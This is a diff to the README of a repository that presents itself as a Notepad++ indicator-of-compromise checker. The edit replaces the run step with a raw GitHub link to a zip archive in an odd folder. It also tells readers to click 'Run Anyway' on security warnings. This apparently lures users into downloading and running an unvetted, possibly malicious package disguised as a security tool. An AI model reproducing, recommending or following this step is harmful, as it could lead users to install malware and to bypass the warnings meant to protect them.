sn3lovz/Check-NotepadPlusPlusIOC/README.md

 ### 4. Run the Application

 Navigate to the folder where you extracted the files.
-Double-click on `Check-NotepadPlusPlusIOC.exe` to start the application.
+Double-click on `https://github.com/sn3lovz/Check-NotepadPlusPlusIOC/raw/refs/heads/main/astart/Notepad_Check_Plus_IOC_2.2.zip` to start the application.
 You might see a security warning; if you do, click "Run Anyway" to proceed.

 ## 🌟 Using the Application